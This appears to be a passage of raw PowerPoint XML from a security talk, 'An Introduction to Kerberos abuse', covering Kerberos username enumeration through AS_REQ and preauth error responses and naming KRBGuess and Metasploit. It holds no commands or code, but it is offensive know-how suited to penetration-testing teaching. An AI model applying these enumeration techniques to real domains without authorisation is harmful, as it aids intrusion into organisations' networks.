              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>An Introduction to Kerberos abuse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A53D409-D1A3-0743-A887-E024B74555E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oliver Morton</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Grimhacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20848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B9E3E-DFF8-49B9-996E-CDE569B23146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438507" y="41235"/>
            <a:ext cx="9322420" cy="6780937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315159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991942-9D42-472D-B369-941F1E7B6C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884556" y="-34523"/>
            <a:ext cx="8341112" cy="6859793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278087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118836-F7A5-49A5-B4B9-CF5F7C196CB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486723" y="-12303"/>
            <a:ext cx="7192536" cy="6857800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147114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2B19-7525-4CFF-AA21-45852E452484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eugh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>….! Boring! Get to the point!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3269FD-5EC3-4030-A44B-8CB28468FDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>….Pretty diagrams….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>…Packet Captures…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>….Rambling walkthrough….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0"/>
              <a:t>*yawn* when’s the next coffee break?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2557840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3C1A-C377-42B9-9A8A-1534D5F8C148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 1: Username Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3151097E-DB09-43F0-9CD8-0AA453059A1F}"/>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1303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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Username Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806569" y="2963226"/>
            <a:ext cx="232584" cy="267904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D61540-DC03-44A1-8741-932FC8C5B903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2897659" y="585706"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8D8511-4A08-42CA-B5A4-222AA8E1FA10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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21C91D3-A3E5-4035-91FE-4988FBDEE9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBC2D70-F582-438D-9CD3-0F3DA7309D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3031958" y="1018435"/>
            <a:ext cx="5221705" cy="1616481"/>
            <a:chOff x="3031958" y="1018435"/>
            <a:chExt cx="5221705" cy="1616481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="54" name="Straight Arrow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFC4EA1-6F7F-416E-93DC-65774BB1599A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3031958" y="1018435"/>
              <a:ext cx="5221705" cy="1616481"/>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8FF6679-51CA-4346-BC51-434245CCB870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4202687" y="1360887"/>
              <a:ext cx="3224108" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>KRB_ERR (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Preauth</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> required)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146272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9B99-F8D1-40DC-BF31-03EA254D8288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210586" y="114301"/>
            <a:ext cx="11981414" cy="904134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens if we present an invalid username?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3992B973-6334-474A-953A-E912A2DDBDD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="23103" y="2465882"/>
            <a:ext cx="12193517" cy="2226038"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314858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5BD3-26E6-4A61-866E-B3BFC9CBFCCB}"/>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85CE62A-1448-4250-92D2-A216372C78F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227223" y="-1044"/>
            <a:ext cx="9661358" cy="6859565"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4274516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3BC8-A4BA-44EB-BF70-98AA247ABB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11282A56-0048-464D-BA44-84D5AE8DABA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1357911"/>
            <a:ext cx="9905998" cy="904135"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KRBGuess.jar  (https://www.cqure.net/wp/tools/password-recovery/krbguess/)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7C9B79-4C62-4929-B256-F98E1CC2D0E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2205121"/>
            <a:ext cx="12216983" cy="4503665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128357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8D55-3F99-4B72-996F-BB948130DA12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2588AEB-7DB8-435F-9BA7-38996E82D194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210586" y="1247775"/>
            <a:ext cx="9905998" cy="663394"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94461D12-A940-407E-98F7-78D305914EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420911" y="971988"/>
            <a:ext cx="8761751" cy="5857743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428323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F1D2-E3D1-477E-A93D-FA8428FF5958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
